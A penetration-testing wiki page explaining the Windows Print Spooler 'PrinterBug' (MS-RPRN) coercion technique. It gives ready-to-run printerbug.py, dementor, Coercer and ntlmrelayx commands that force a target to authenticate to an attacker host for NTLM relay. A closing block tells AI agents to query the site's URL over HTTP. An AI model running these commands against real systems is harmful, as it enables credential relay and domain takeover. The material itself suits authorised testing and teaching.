# MS-RPRN abuse (PrinterBug)

## Theory

Microsoft’s Print Spooler is a service handling the print jobs and other various tasks related to printing. An attacker controling a domain user/computer can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a target of the attacker's choosing. This flaw is a "won't fix" and enabled by default on all Windows environments ([more info on the finding](https://fr.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/47)).

**The coerced authentications are made over SMB**. But MS-RPRN abuse can be combined with [WebClient abuse](/ad/movement/mitm-and-coerced-authentications/webclient.md) to elicit incoming authentications made over HTTP which heightens [NTLM relay](/ad/movement/ntlm/relay.md) capabilities.

The "specific call" mentioned above is the `RpcRemoteFindFirstPrinterChangeNotificationEx` notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.

{% hint style="info" %}
The attacker needs a foothold on the domain (i.e. compromised account) for this attack to work since the coercion is operated through an RPC call in the SMB `\pipe\spoolss` named pipe through the `IPC$` share.
{% endhint %}

## Practice

Remotely checking if the spooler is available can be done with [SpoolerScanner](https://github.com/vletoux/SpoolerScanner) (Powershell) or with [rpcdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/rpcdump.py) (Python).

The spooler service can be triggered with [printerbug](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) or [SpoolSample](https://github.com/leechristensen/SpoolSample) (C#). There are many alternatives available publicly on the Internet.

{% tabs %}
{% tab title="Enumerate" %}
**rpcdump**

We can check if the spooler service is available on a target using [rpcdump.py](https://github.com/fortra/impacket/blob/master/examples/rpcdump.py) from impacket.

```bash
rpcdump.py $TARGET | grep -A 6 "spoolsv"
```

**NetExec**

[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to check if the spooler service is running.

```bash
netexec smb <TARGET> -u <USER> -p <PASSWORD> -M spooler
netexec smb <TARGET> -u <USER> -p <PASSWORD> --local-auth -M spooler
```

**SpoolerScanner**

Check if the spooler service is available (Windows) using [SpoolerScanner](https://github.com/vletoux/SpoolerScanner) (Powershell)

```powershell
.\SpoolerScan.ps1
```

{% endtab %}

{% tab title="Exploit" %}
**PrinterBug**

Using [printerbug](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) (python) we can trigger the spooler to authenticate against our cotrolled server.

```bash
printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'
```

**Dementor**

Using [dementor](https://github.com/NotMedic/NetNTLMtoSilverTicket/blob/master/dementor.py) (python) we can trigger the spooler to authenticate against our cotrolled server.

```bash
python dementor.py -d $DOMAIN -u $USERNAME -p $PASSWORD $ATTACKER_IP $TARGET_IP
```

**Coercer**

Yet another alternative is to use the [Coercer](https://github.com/p0dalirius/Coercer/tree/master) tool (python) as follow.

```bash
# Coerce
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-RPRN -l $ATTACKER_IP -t $TARGET_IP

# Coerce a specific method
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-method-name RpcRemoteFindFirstPrinterChangeNotificationEx -l $ATTACKER_IP -t $TARGET_IP
```

{% endtab %}

{% tab title="ntlmrelayx" %}
In the situation where the tester doesn't have any credentials, it is still possible to [relay an authentication](/ad/movement/ntlm/relay.md) and trigger the spooler service of a target via a SOCKS proxy.

```bash
ntlmrelayx.py -t smb://$TARGET -socks
proxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'
```

{% endtab %}
{% endtabs %}

{% hint style="info" %}
**Nota bene**: coerced NTLM authentications made over SMB restrict the possibilites of [NTLM relay](/ad/movement/ntlm/relay.md). For instance, an "unsigning cross-protocols relay attack" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.
{% endhint %}

## Resources

{% embed url="<https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://red.infiltr8.io/ad/movement/mitm-and-coerced-authentications/ms-rprn.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.